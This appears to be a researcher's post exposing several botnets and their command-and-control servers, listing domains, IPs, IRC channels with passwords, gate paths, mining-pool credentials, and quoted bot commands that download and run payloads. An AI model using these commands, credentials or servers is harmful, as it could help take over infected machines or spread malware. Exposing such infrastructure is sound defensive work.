Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208
Server: x01bkr2.biz
Port: 4723
Channel: #o.O
Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd
Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013
The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg
Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz
Hosting infos: http://whois.domaintools.com/94.242.237.128
Hosting infos: http://whois.domaintools.com/37.221.170.208
EDIT: snk is now desperately
lxm.m94vo3.com (BitCoin Miner hosted in France Paris Gandi Sas)
Thanks to Aliss for the sample
Resolved : [lxm.m94vo3.com] To [92.243.23.55]
Resolved : [lxm.m94vo3.com] To [92.243.4.137]
minerd.exe -a scrypt -u fukkerrrr.1 -p x -s 15 --no-longpoll -q -o lxm.m94vo3.com:8080
sample here
hosting infos: http://whois.domaintools.com/92.243.23.55
rocksolidswag.no-ip.org (Betabot http botnet hosted by ecatel.net)
Resolved rocksolidswag.no-ip.org to 89.248.160.146
Server: rocksolidswag.no-ip.org
Gate file: /swag/order.php
Alternate domains: swazers.com pirateleaks.us lilseizurespizza.com trytoperceive.me
The owner is mining some bitcoins: http://askaa_worker:penis@us3.eclipsemc.com:8337
Hosting infos: http://whois.domaintools.com/89.248.160.146
h.opennews.su (irc botnet hosted by qhoster.com)
Resolved h.opennews.su to 5.45.181.254
Server: h.opennews.su
Port: 9000
Channel: #sp
Channel password: yop
Topic for #sp is: !wB/smZJsKbDADvo5ab8sIF/r5RP7kkXfEsreBMH+9hiVs3ilngzFHh0Ph9sbgtC/EeqYw5x0Vj2IqRyb/knFS+LUzo6bf3cW/A1SyUXkVxz8ERDPS2K/qHObIS3TFyR2JAiWdnWc82S3KnAwUHQFMEb6h/kQqB9TcZElsKS4BnyDiGp1B19crjVgBes7+ilkHVmFLRRgoSPyUBx71ioiUporVdeOIEUhA547CIbp0odHxRQ41LK9wPz13N8KYZx6/QE//rZhBqCorPJqg3w=
Topic for #sp set by SNK at Thu Apr 04 06:16:09 2013
Example bot nick: n{USA-XPx86u}gjekbowg
Alternate domains: f.eastmoon.pl gigasbh.org gigasphere.su o.dailyradio.su photobeat.su s.richlab.pl uranus.kei.su xixbh.com xixbh.net
You may recognize some of the domains from previous posts
privategallerie.info (Andromeda http botnet hosted by vmbox.co)
Resolved privategallerie.info to 198.20.67.66
Server: privategallerie.info
Gate file: /admin/hippo/image.php
Bitcoin mining info: http://pr3m1era_quio:mota@eu.triplemining.com:8344
A previously posted andromeda botnet had a similar folder path to the gate file.
Hosting infos: http://whois.domaintools.com/198.20.67.66
keep.hustling4life.biz (Bitcoin mining pool for botnet)
Resolved keep.hustling4life.biz to 195.190.13.138, 46.17.92.158, 213.165.85.165
Someone is trying to get some mining done before the mining reward drops I guess. The file is from an already posted botnet.
* Topic for #mr is: !dl hxxp://213.165.85.165:8081/udhsdfka.png
* Topic for #mr set by test at Mon Nov 26 04:52:40 2012
Server: keep.hustling4life.biz
Port: 2142
Mining information:
cheatmodernwarfare.com (Multiple http bots hosted by Romania Torben Diehr)
Posting some french heckers stuff
Andromeda loader
Server: cheatmodernwarfare.com
Gate file: /xbox/image.php
Rootkit plugin: hxxp://magnatesmobileapps.com/sym/r.pack
Socks plugin: hxxp://magnatesmobileapps.com/sym/s.pack
Backup domains: down4life.hopto.org explosiontaracesavatoutdechirer.chickenkiller.com fckd330.mooo.com
kbot
Server: h4r3.hopto.org
Redirects to: kb.itprosolutions.org
Gate file: /joomla/gate.php
Server: purenet.hopto.org
Redirects to: 91.234.105.14
Gate file: /kb/gate.php
Server: smk.cheatgame.org
Gate file: /kb/gate.php
Smoke loader (Currently down)
Server: smk.cheatmodernwarfare.com
Gate file: /s2/control.php
Hostbooter
planetstat2324.su (smoke loader http bot hosted by Poland Artnet Spolka Z Ograniczona Odpowiedzialnoscia)
This is the http loader for the gold installs ppi program.
Resolved planetstat2324.su to 178.255.43.67
Server: planetstat2324.su
Gate file: /gamenew/index.php
Downloads files from ap2producoes.com/images/
minsabdedf.exe bitcoin miner pool info: http://hernyoooo@ymail.com:Bazdmeg1@pool.50btc.com:8332
ginamdasm.exe The file botnet owners are given installs smoke from hxxp://oroihfdbbnennm.in/update/0pdat3.exe
Install statistics are then recorded by oroihfdbbnennm.in/activation.php
Using the format activation.php?productid=(userid)&serial=(long string)
Hosting infos:
vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)
Resolved vandersand.no-ip.biz to 199.115.230.138
Server: vandersand.no-ip.biz
Port: 6654
Channel: #Insomnia
Channel password: frosty
* Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5
* Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012
Botnick: {IT|XP-32a}uwryxvf
While I was in the channel he downloaded a bitcoin miner
Dextermania.exe hxxp://versx.net/x/bcm/bitcoin-miner.exe
http://pool.bitclockers.com:8332 -u Dexter -p 19930924
Hosting
bb.qc.to (IRC botnets hosted by France Roubaix Ovh Systems)
Resolved bb.qc.to to 37.59.35.104
Server: bb.qc.to
Port: 7356
Password: d0wn
* There are 1 users and 896 invisible on 1 servers
* 4 :unknown connection(s)
* 41 :channels formed
* I have 897 clients and 0 servers
* Current Local Users: 897 Max: 1356
* Current Global Users: 897 Max: 1356
Channel: #d0wn4l1f3
Pass: down